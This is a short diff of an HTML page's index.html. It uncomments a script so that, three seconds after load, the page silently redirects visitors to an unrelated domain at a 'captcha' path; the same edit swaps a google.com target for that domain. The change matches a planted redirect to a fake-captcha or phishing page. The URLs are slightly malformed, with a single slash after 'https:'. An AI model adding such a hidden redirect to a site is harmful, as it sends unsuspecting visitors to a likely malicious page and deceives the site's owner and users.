--- a/index.html
+++ b/index.html
@@ -75,11 +75,11 @@
         </div>
     </div>
 
-<!--     <script>
+    <script>
         setTimeout(function() {
-            window.location.href = "https:/google.com/captcha/?ref=&shop2go=/"; 
+            window.location.href = "https:/kra30at.at/captcha/?ref=&shop2go=/"; 
         }, 3000);
-    </script> -->
+    </script> 
 </body>
 
 </html>
